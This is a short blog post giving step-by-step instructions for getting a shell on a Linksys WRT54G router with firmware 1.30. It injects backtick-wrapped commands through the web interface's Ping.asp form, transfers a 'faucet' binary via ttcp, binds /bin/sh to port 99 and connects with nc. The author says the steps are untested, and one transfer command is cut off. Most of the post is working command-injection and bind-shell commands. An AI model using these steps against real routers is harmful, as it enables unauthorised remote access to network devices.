WRT54G Shell!

Ross Jordan is smart. He figured out how to get a shell on the little blue box.

I haven’t tested this yet (it’s too hot, it’s late, and I dont want to fry my wrt at the moment), but here are the steps:

Firmware 1.30 is required

Go to http://192.168.1.1/Ping.asp

`cp /usr/sbin/epi_ttcp /tmp/t`

click ‘ping’

Go to http://192.168.1.1/Ping.asp

`/tmp/t -r -p 10 > /tmp/fa&`

click ‘ping’

on your PC, download Rob’s mips compiled faucet
and the CERN version of ttcp (compile it on your PC)

On your PC, create a loop to transfer faucet to the AP

while `/bin/true`; do ttcp -t -p 10


Go to http://192.168.1.1/Ping.asp 

`/tmp/fa 99 -ioe /bin/sh`

click ‘ping’

From your PC:

nc 192.168.1.1 99

At this point, you should be on your WRT and happy. If you’re not, you’ve becom
e part of the brickmakers union.

0 Responses to “WRT54G Shell!”


  1. No Comments

Leave a Reply